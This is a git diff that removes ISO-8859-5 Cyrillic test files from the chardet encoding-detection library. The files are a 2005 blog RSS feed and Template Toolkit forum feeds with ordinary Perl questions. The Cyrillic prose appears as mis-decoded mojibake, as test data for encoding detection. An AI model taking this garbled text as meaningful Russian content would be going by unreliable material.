ׂ ׀כ ױאױׂאדײױ״ן ²²ֱ, ״ ׀ בג׀ׂ׀בל גל װ: ׂױא״גל ׂ ׀טױ װױג״יױ.¼כ דא אװײ׀״ א׀ׁג׀גל ״ ׁױװ״״. 13 ׀ׂ׃דבג׀ 2005 ׃װ׀ ״״בגא ׁאכ א״ן אױטױ״ױ ׂמח״גל ֱד-34 ׂ ׃בדװ׀אבגׂױכ ׳׀׀׳, גױ ב׀כ װׂױװן ״ג׃ׂדמ חױאגד װ אױ׳דלג׀ג׀״ ׂבױו ״בכג׀״ - ״ ׀ט״כ, ״ מװױ \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-cyrillic/blog.mlmaster.com.xml b/chardet/tests/iso-8859-5-cyrillic/blog.mlmaster.com.xml deleted file mode 100644 index 0546c2a..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/blog.mlmaster.com.xml +++ /dev/null @@ -1,170 +0,0 @@ - - - - - - - chub@tosy - http://blog.mlmaster.com - love & peace ! - Wed, 28 Dec 2005 08:53:15 +0000 - http://wordpress.org/?v=1.5.2 - en - - - ֱ ½³! - http://blog.mlmaster.com/?p=296 - http://blog.mlmaster.com/?p=296#comments - Wed, 28 Dec 2005 08:53:15 +0000 - danil - - General - http://blog.mlmaster.com/?p=296 - - http://blog.mlmaster.com/?feed=rss2&p=296 - - - ¿װ׃גׂ׀ מׁ״ױמ - http://blog.mlmaster.com/?p=295 - http://blog.mlmaster.com/?p=295#comments - Wed, 21 Dec 2005 19:43:43 +0000 - site admin - - General - http://blog.mlmaster.com/?p=295 - - http://blog.mlmaster.com/?feed=rss2&p=295 - - - ½׀ט״ ״כױ ׳׀׃א׀״חכױ װאד׳לן - http://blog.mlmaster.com/?p=294 - http://blog.mlmaster.com/?p=294#comments - Fri, 16 Dec 2005 09:19:20 +0000 - danil - - General - http://blog.mlmaster.com/?p=294 - - http://blog.mlmaster.com/?feed=rss2&p=294 - - - ֱ׀ׂױ, דײ׀ בׂן׳ל. - http://blog.mlmaster.com/?p=293 - http://blog.mlmaster.com/?p=293#comments - Wed, 14 Dec 2005 14:36:19 +0000 - RuAnShi - - General - http://blog.mlmaster.com/?p=293 - - http://blog.mlmaster.com/?feed=rss2&p=293 - - - ° ד הױבג״ׂ׀ױ - http://blog.mlmaster.com/?p=292 - http://blog.mlmaster.com/?p=292#comments - Tue, 06 Dec 2005 16:21:26 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=292 - - http://blog.mlmaster.com/?feed=rss2&p=292 - - - Exit the movie - http://blog.mlmaster.com/?p=291 - http://blog.mlmaster.com/?p=291#comments - Mon, 05 Dec 2005 18:01:09 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=291 - - http://blog.mlmaster.com/?feed=rss2&p=291 - - - ½״טגן - http://blog.mlmaster.com/?p=289 - http://blog.mlmaster.com/?p=289#comments - Mon, 05 Dec 2005 14:37:11 +0000 - danil - - General - http://blog.mlmaster.com/?p=289 - - http://blog.mlmaster.com/?feed=rss2&p=289 - - - °״ב׀ - http://blog.mlmaster.com/?p=288 - http://blog.mlmaster.com/?p=288#comments - Tue, 29 Nov 2005 08:58:22 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=288 - - http://blog.mlmaster.com/?feed=rss2&p=288 - - - ²ױ׀א׀ה - http://blog.mlmaster.com/?p=287 - http://blog.mlmaster.com/?p=287#comments - Tue, 29 Nov 2005 08:55:52 +0000 - chubatos - - General - http://blog.mlmaster.com/?p=287 - - http://blog.mlmaster.com/?feed=rss2&p=287 - - - ÷ױב׀ - http://blog.mlmaster.com/?p=286 - http://blog.mlmaster.com/?p=286#comments - Tue, 29 Nov 2005 08:52:59 +0000 - chubatos - - fun - http://blog.mlmaster.com/?p=286 - - http://blog.mlmaster.com/?feed=rss2&p=286 - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.1.xml b/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.1.xml deleted file mode 100644 index 4f8d358..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.1.xml +++ /dev/null @@ -1,428 +0,0 @@ - - - - - ִאדכ Template Toolkit : ְ׀ׁג׀ ב Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-1.html?rss - Template Toolkit - ׁכבגא׀ן, י׀ן ״ א׀בט״אןױ׀ן ב״בגױ׀ ׁא׀ׁג״ ט׀ׁׂ. ½׀ ב׀גױ א׀ׁג׀ױג האד, ׂ גא ׁבדײװ׀מגבן ׂאבכ ״בל׳ׂ׀״ן ׁ״ׁ״גױ״ א׀ׁגױ ב ט׀ׁ׀״. ·׀בגׂ ב Template Toolkit. ²׳ײבג״ ׁ״ׁ״גױ״, א״ױכ ״בל׳ׂ׀״ן. ¿אׁױכ ״ ״ו אױטױ״ױ. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 12 Dec 2005 10:09:35 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ט׀ׁכ ׂ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - Wed, 7 Dec 2005 11:19:46 GMT - Template::Plugin::XML::RSS - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - א״ ״בל׳ׂ׀״״ Template::Plugin::XML::RSS ׂױבל ׂכׂװ ״׳ װׂ״ײ׀ Template בא׀׳ד ׀ח״׀ױג װױ׀גלבן ׂ UTF-8. ׀ׁבמג ׂױבל. ֲדג האד ׂאװױ ׀ ׂ RSS װ׀כױ א׀״ג ״ װ״אׂ׀ koi-8-r א׀ׁג׀ױג.<br /> -א״ םג ׂבױ כג״ ױאױװ׀גל ׂ בגאדגא XML::RSS-&gt;new (encode =&gt; 'ן_װ״אׂ׀') ::RSS-&gt;new ( output =&gt; 'ן_װ״אׂ׀') ױ א׀גכׂ׀ױג :-(<br /> -״׳דחױ״ױ אױ׳דלג׀ג׀ א״ DEBUG_ALL ״ חױד ױ א״ׂױ״. ׂ גא׀בב״אׂױ װױׁ׀׃׀ ׂבױ װ׀כױ ״װדג ׂ דײ ױ װ״אׂױ. .ג.ױ. ׁױ׳ ױאױװ״אׂ׀״״ װׂ״ײ TT2<br /> -<br /> -ײױג ׃װױ-ג םגג ׀׃״ ױאױאכׂ׀ױג TT2-טכ $output ?<br /> -<br /> -ׂג ג׀׀ן בגאדז״ן:<br /> -[% USE news = XML.RSS('forum_1.xml') %]<br /> -[% FOREACH item = news.items %]<br /> -&lt;pre&gt;<br /> - [% item.title %]<br /> -&lt;/pre&gt;<br /> -[% END %] - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-120.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-120.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - Thu, 1 Dec 2005 09:33:45 GMT - ´ׂ׀ include-׀ג׀׃׀ - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - ֳ ױן ג׀׀ן ב״גד׀ז״ן. ³אד׀ ב׀גׂ (טגד 10) ״ױמג חג״ װ״׀ׂױ האױ״ױ. ֱ׀גכ בװױ׀כ ׀ TT2. ֱױח׀ב ד ׀ײװ׃ ב׀ג׀ בׂ templates ׀ג׀׃.<br /> -½ ׃״ױ ה׀כ װ״׀ׂכ (ױ ׂבױ).<br /> -ֽג ױ חױל דװׁ, ׁׂןגל ׂ 10 ױבג׀ו.<br /> -<br /> -÷׀ בװױ׀גל װׂ׀ include ׀ג׀׃׀ ד TT חגׁכ ״ב׀ ב׀ח׀׀ ׂ װ ׀ג׀׃ױ(׀א״ױא ׁיױ template), ׀ ױב״ ױ ׀טױ - ׂ װאד׃ (װן ׀ײװ׃ ױיױ ״ ד״׀לכ ׀ג׀׃ template)? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-118.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-118.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - Thu, 17 Nov 2005 05:29:38 GMT - template Factory - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - ¿כג׀מבל אױ׀״׳ׂ׀גל ױחג ׀׀׃״חױ ט׀ׁד Factory (װ״ ׃׀ׂ ט׀ׁ, ״ ׃ ט׀ׁׂ אװדגׂ),<br /> -ֱגׂױגבגׂױ א״ ׀״ב׀״״ ט׀ׁׂ-אװדגׂ ה׀ׁא״״ וגױבל ׁכ גבױײ״ׂ׀גל ״ו בױז״ה״׀ז״מ. ׀ ״״ד ׀״ח״ױ אױװױױכו ׁׂ BLOCK...END ״ ױאױװױױכו ױאױױכו. <br /> -ֲ.ױ. ױאױװ ׂמחױ״ױ ט׀ׁ׀ (INCLUDE) ׀״-ג ׁא׀׳ &quot;א׃ןגל ױ׃ ׀ בגׂױגבׂ״ױ בױז״ה״׀ז״״ ה׀ׁא״״&quot;<br /> -¿ׂכאןבן ׂ ׀בב-װדױ Template::Context ׀טױ ג׀ ױאױױדמ ׀בב׀ BLKSTACK, ״חױ׃ ׂןג׃ ״׳ ױס ױ ׃ד ׂכג׀י״גל, ג״׀:<br /> -foreach my $i ($template-&gt;service-&gt;context()-&gt;BLKSTACK) {<br /> -.....<br /> -} - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-117.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-117.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - Sun, 6 Nov 2005 18:33:25 GMT - ÷׀ װ׃אד׳״גל װדל ׀ׂג׀ג. - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - ױבגל אׁױ׀ ׂ ׀ײװ גױױגױ ב׳װ׀מ בׂ ׀׃״. ׀ וחױגבן ב׳װ׀גל ױ׃ א״ ב׳װ׀״״ Template <br /> -<br /> -בױח׀ב א״ב׀<br /> - PLUGINS=&gt;{<br /> - 'Atma'=&gt;'Atma::TPlugin'<br /> - },<br /> -״ ׂ ׀ײװ גױױגױ ״טד <br /> -[% USE Atma(c) %]<br /> -[% Atma.myfunc(&quot;lalala&quot;)%]<br /> -<br /> -<br /> -ד׳׀ חג ײ ױ׃ א״אדג״גל ב ילמ <br /> -״ ױ ״ב׀גל USE Atma(c)<br /> -# LOAD_PLUGINS =&gt; Atma::TPlugin-&gt;new($self, $self),<br /> - ױןגכ ױ׃ ׀א׀ױגאכ ״ חג-ג אד׃׀בל חג ױ׀וװ״ג הדז״מ fetch, װױ״גױבל כג ׀ דײ םג בװױ׀גל ? - - Dmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-116.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-116.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - Tue, 1 Nov 2005 15:03:41 GMT - ¸ ױיס ׀ װׂ״ײ האד׀ ״בל׳דױגױ?? - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - ֱ׀ׁײ:) - - ֱױװכג <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-114.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-114.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - Tue, 1 Nov 2005 15:02:06 GMT - »׀״׳׀ז״ן ב׀ג׀ ב ילמ TT - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - ÷׀ בװױ׀גל ׀״׳׀ז״מ ב׀ג׀ ב ילמ TT??<br /> -ן ׂכױב ׂבױ גױבגׂכױ בגא״ ״׳ ט׀ׁׂ ׂ גװױלכױ ה׀כ ג״׀<br /> -messages.en<br /> -[% mess1=&quot;English1&quot; %]<br /> -[% mess2=&quot;English2&quot; %]<br /> -<br /> -messages.ru<br /> -[% mess1=&quot;ְדבב״1&quot; %]<br /> -[% mess2=&quot;ְדבב״2&quot; %]<br /> -<br /> -׀ ׂ ט׀׀ו בגׂױגבגׂױ א״ב׀<br /> -[% IF lang == &quot;en&quot; ][% INCLUDE messages.en %][% END %]<br /> -&lt;html&gt;<br /> -[% mess1 %]<br /> -&lt;/html&gt;<br /> -װד׀ װמח׀גל םג״ ה׀כ ׂ ׳׀ׂ״ב״בג״ ג ן׳כ׀ ג׀ ױ א׀ׁג׀ױג!! ¼ײױג ג ״ׁדװל בׂױגדױג?<br /> -ב׀ב״ׁ - - ֱױװכג <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-113.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-113.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - Thu, 27 Oct 2005 11:48:26 GMT - ¿אױװבג׀ׂױ״ן - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - ג-״ׁדװל ל׳דױג view? חױל דװׁ׀ן טגד׀, בדי׀ױג גל חג ׀ ׀ ׂ &quot;םבױא״ױג׀ל&quot; ׂ״װױ. ¸״ ״ױױג בכ ל׳ׂ׀גלבן? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-112.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-112.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - Wed, 28 Sep 2005 15:05:48 GMT - Template Toolkit winXP - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - ´ׁאכ װױל.<br /> -¿װב׀ײ״גױ ײ׀דבג׀ &#8211; ׀ דבג׀ׂ״גל Template Toolkit winXP?<br /> -ֿ ״בל׳דמ ActivePerl 5.8.6. <br /> -²מח׀מ PPM. ¸ ׀ט װ״׀׃ ב PPM- ׂכ׃ןװ״ג ג׀:<br /> -Ppm-&gt; install Template<br /> -Ppm-(גׂױח׀ױג:) &#8211; ג׀׃ ן׀!!! <br /> -¸״<br /> -Ppm-&gt; install TemplateToolkit<br /> -Ppm-(גׂױח׀ױג:) &#8211; ג׀׃ ן׀!!! <br /> -÷׀ ױ דבג׀ׂ״גל Template Toolkit װ winXp.<br /> -°ױבױ - - Washington <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-110.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-110.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - Sun, 25 Sep 2005 11:50:06 GMT - fork() ׂ [% PERL %] - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - ¿װב׀ײ״גױ, ײ׀דבג׀, ׀ אאױג ׂכ״גל fork() ׂ ׁױ [% PERL %] TT?<br /> -<br /> -¿אבג ׂןױגבן אױבדאבױ׀ן ױא׀ז״ן, ׀ ױאׂ׀ח׀לכױ װ׀כױ ׀װ ׂ׳ׂא׀י׀גל ׀ ײ ׁכבגאױױ.<br /> -<br /> -ֳ ױן ׂ ױאױױ ׂ $stash בװױאײ״גלבן ד׀׳׀גױל ׀ ױג ±´ ״ ױ ׀ײױגלבן, חג ב ״ fork ױ בׂבױ אאױג א׀ׁג׀ױג. ֲ׀ױ ידיױ״ױ, חג ׳׀ׂױאטױ״״ הא׀ םגג ױג ׳׀אכׂ׀ױגבן. - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-109.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-109.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - Wed, 21 Sep 2005 11:45:38 GMT - TT דװ׀ןױג ד״. - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - ¾חױל בגא׀כ ׃מ, דײױ װ׃ ׁלמבל, אױטױ״ן ױ ׂ״ײד.<br /> -¿ױאױװ׀מ ׂ ט׀ׁ: <br /> -{params}-&gt;{year}-&gt;'2005';<br /> -ׂ ט׀ׁױ ״טד<br /> -[% params.year %]<br /> -<br /> -״ ׂ״ײד 25! ױב״ ״טד 1998, ׂ״ײד 1998, ׀ ױב״ ״טד 20010007, ׂ״ײד 217!<br /> -<br /> -ג-״ׁדװל בג׀״ׂ׀בן? ׀ ױח״גל? - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-108.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-108.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - Thu, 15 Sep 2005 12:41:43 GMT - eval() ׂ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - ֱדיױבגׂדױג ״ ׂ TT2 ׀׀׃ eval() ׂ Perl? ֲ. ױ. ױב״ ן ״ױמ אױױדמ ׂ ט׀ׁױ, ׳׀חױ״ױ גא בװױאײ״ג װ״אױג״ׂכ, ג ׀ ׂבג׀ׂ״גל ׂ ט׀ׁ ׳׀חױ״ױ םג ױאױױ, חגׁכ װ״אױג״ׂכ ׁכ״ ׂכױכ, ׀ ױ ׂכׂװ״״בל ׀ גױבג? - - Dionys <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-107.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - Wed, 31 Aug 2005 11:47:31 GMT - ¿׀א׀ױגאכ ״׳ ט׀ׁ׀ ׂ ט׀ׁ - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - ¿א״ׂױג ׂבױ<br /> -·׀א׀ױױ ׁ׀׃װ׀אױ ׳׀ ׃א׀גכ גׂױג<br /> -¿אׁױ׀ ג׀׀ן<br /> -÷׀ ױאױװ׀גל ״׳ ט׀ׁ׀ ׀א׀ױגאכ ׂ ט׀ׁ<br /> -½׀א״ױא<br /> -[% INCLUDE tmpl(para1=&gt;value,para2=&gt;value2,...) %] - - plcgi <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-106.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - Mon, 8 Aug 2005 04:57:04 GMT - INCLUDE - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - ׀ אׁאב״גל ױאױױדמ ׂ WRAPPER חױאױ׳ זױכ ױב BLOCK...END ׂמחױכו חױאױ׳ INCLUDE.<br /> -כג׀בן ׂ ׁ״׳ױב-׃״ױ חװױ׀גל setter-getter ױ ׀׀ױג חױדג, וגן WRAPPER ׂאװױ ׁא׀ׁ׀גכׂ׀ױגבן בױ ׂבױו ׂײױכו ׁׂ...<br /> -<br /> -PS: PROCESS ױ אױװ׀׃׀גל.<br /> -<br /> -PPS: וג׀ ׂ ׃׀ׂ ׂא׀ױאױ ׂכׂװ״גל ב״בגױױ בׁיױ״ױ, ׀ דײ ױ׃ ׃ױױא״גל ׂ ׂײױכו ט׀ׁ׀ו. - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-104.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - Fri, 22 Jul 2005 12:42:52 GMT - ׀ בװױ׀גל ׀גױ׀ז״מ בגא? ״ ױ א׀ׁג׀ױג i=i-1 - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - ׀ בװױ׀גל ׀ג׀ױז״מ בגא? (ױא׀גא גח׀ ׂ ױא)<br />ב׀ײױ, ג׀:<br /><br /><div class="code"><pre> -[%SET i=&quot;aaa&quot;.&quot;bbb&quot; %] - -דח׀ױ: -unexpected token (.) -</pre></div><br /><br />¸ ױיױ. ½ױ א׀ׁג׀ױג<br /><div class="code"><pre> -[% i=i-1 %]: - -file error - parse error - articles/index.html line 32: unexpected token (-1) [% i=i-1 %] -</pre></div><br /><br />םג ה״ח׀ ג׀׀ן?<br />ׂױװל [% i=i+1 %] א׀ׁג׀ױג!<br />׀ ן ן -- ״ ++ ױ בדיױבגׂדמג :(<br /><br />ׂױאב״ן template toolkit 2.14 - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-103.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - Mon, 18 Jul 2005 06:24:54 GMT - Bug ״״ Feature ? ½ױ א׀ׁג׀מג $_, $! ״ ג.. - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - ָ׀ׁ:<br /> -[% PERL %]<br /> - $_ = 'test';<br /> - $stash-&gt;set(msg =&gt; $_);<br /> -[% END %]<br /> -&lt;div&gt;[% msg %]&lt;/div&gt;<br /> ---------------------<br /> -tpage --eval_perl<br /> -²כװ׀סג <br /> -Segmentation fault - - ½״׀ ¼׀ב״ׂ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-100.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - Thu, 14 Jul 2005 07:48:40 GMT - ¾ױא׀ז״ן װױױ״ן (ׂ ט׀ׁױ) - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - ½׀א״ױא<br /> -[% a=10 %]<br /> -[% b=5 %]<br /> -<br /> -[% c=a/b %]<br /> -<br /> -²כװ׀ױג ט״ׁד. ²בױ װאד׃״ױ ױא׀ז״״ א׀ל.<br /> -² חױ א״ח״׀? - - ֱױא׃ױ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-99.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - Thu, 14 Jul 2005 03:03:52 GMT - Unit Tests - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - ÷ג ״ ׀ ״טױג UnitTest-כ װן בׂ״ו ט׀ׁׂ.<br /> -ֳ ױן ׀ UnitTest-׀״ אכׂ׀ױגבן גל ׁ״׳ױב ׃״׀ (גא׀ן ²ֱֿ ׂכױבױ׀ ׂ *.pm)<br /> -½ד ׀ ד ׂ׀ב ׀בחױג הדז״׀לכו גױבגׂ, בׁױ WEB-״גױאהױב׀? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-98.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - Mon, 11 Jul 2005 08:56:40 GMT - mod_perl, בׁׂײװ׀ױגבן ״ ׀ןגל ׂדגא״ ט׀ׁ׀ TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - µבגל handler ׀ װױאױ <br /> -ׂ א׀גזױ.<br /> -<br /> -package My::controller;<br /> -our $c; # ׃ׁ׀ל׀ן ױאױױ׀ן, וםט ׂ גא ׂבױ חג ױׁוװ״<br /> -<br /> -sub handler($$){<br /> - my $class = shift;<br /> - my $r = shift;<br /> -<br /> - $c ||= $class-&gt;new(); # ױב״ דײױ ׁכ ב׳װ׀ אזױבב, ג ׁלטױ ױ דײ װױ׀גל new.<br /> -<br /> - $c-&gt;{t}-&gt;process(&quot;template.tmpl&quot;, $c); # אזױבב״ גױױג ױאױװ׀ׂ׀ן םגג ײױ גאױא ׂ ׀חױבגׂױ ׀א׀ױגאׂ.<br /> -}<br /> -<br /> -##################<br /> -# ב׳װ׀ױ ׁךױג ׂ ןןג״<br /> -##################<br /> -sub new{<br /> - bless $self, $class<br /> -<br /> - $self-&gt;{dbh} = DBI-&gt;connect(.........); # װױ׀ױ ױג<br /> - $self-&gt;{t} = new Template(.........); # װױ׀ױ גױױגכ <br /> - $self-&gt;{cgi} = new CGI; <br /> -<br /> - $self-&gt;{site_path} = &quot;/la/bla/bla/la&quot;;<br /> - $self-&gt;{cgi_path} =&quot;/d/sfd/fs/&quot;;<br /> - return $self,<br /> -}<br /> -<br /> -<br /> -ׂ ט׀ׁױ template.tmpl<br /> -ב׳װ׀מגבן ױאױױכױ [% my_var = &quot;12345&quot; %]<br /> -<br /> -ח״י׀ױגבן ״ ןןגל ׃װ׀ גאזױבב״גבן ט׀ׁ?<br /> -ג.ױ. ׁדװױג ״ $c-&gt;{my_var} דבגכ א״ בױװדמיױ ׳׀אבױ? - - trdmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-97.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - Fri, 8 Jul 2005 10:07:01 GMT - ½ױ ׀׳כׂ׀מגלבן א׀ׂ״ל בגא״ ׂ UTF-8 ׂכׁא׀כױ ״׳ ׁ׀׳כ - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - ²כׁ״א׀מ װ׀כױ ״׳ ׁ׀׳כ MySQL. ´׀כױ ׂ UTF-8.<br />µב״ בװױ׀גל<br /><div class="code"><pre> -print $string_from_database; -</pre></div><br />ג UTF-8 ב״ׂכ ׂכׂװןגבן א׀ׂ״ל.<br />° ױב״ חױאױ׳ ֲֲ, ג UTF-8 ב״ׂכ ׂ ׀ׁא׀׀װ׀ׁאױ.<br />¸ םג ד ױן ׀ל װ ²״װ,<br />׀ בױאׂױאױ װ ־״ב ׂבױ א׀ל. - - rchumak <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-95.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - Wed, 29 Jun 2005 07:06:16 GMT - ¿ױאױװ׀ח׀ ׀א׀ױגאׂ ״׳ ׀׃״׀ - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - ֶ״<br /> -@fld[$n] = ({<br /> -id =&gt; $id,<br /> -type =&gt; $type,<br /> -pr =&gt; \@f,<br /> -});<br /> -<br /> -n++<br /> -÷ױזֶ״׀<br /> -<br /> -return @fld<br /> -<br /> -<br /> -¿אׁױ׀ ׂ ג, חג ׀בב״ׂ @f, דבג׀׀ׂ״ׂ׀ױגבן װ״ ׀ ׂבױ םױױגכ @fld<br /> -÷׀ םג ײ ׁג״? - - ֱױא׃ױ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-93.html - Template Toolkit - ׁ״ׁ״גױ׀ װן א׀ׁגכ ב ט׀ׁ׀״ ׂ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.4.xml b/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.4.xml deleted file mode 100644 index 2e735e5..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - ִאדכ Template Toolkit : ¾ׁבדײװױ״ױ האד׀ - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - ׁכבגא׀ן, י׀ן ״ א׀בט״אןױ׀ן ב״בגױ׀ ׁא׀ׁג״ ט׀ׁׂ. ½׀ ב׀גױ א׀ׁג׀ױג האד, ׂ גא ׁבדײװ׀מגבן ׂאבכ ״בל׳ׂ׀״ן ׁ״ׁ״גױ״ א׀ׁגױ ב ט׀ׁ׀״. ¿אױװײױ״ן א׀ׁגױ האד׀. ¾א׃׀״׳׀ז״ן ׂכו ׀גױ׃א״ ״ האדׂ. - ru - Lobanov Igor - Lobanov Igor 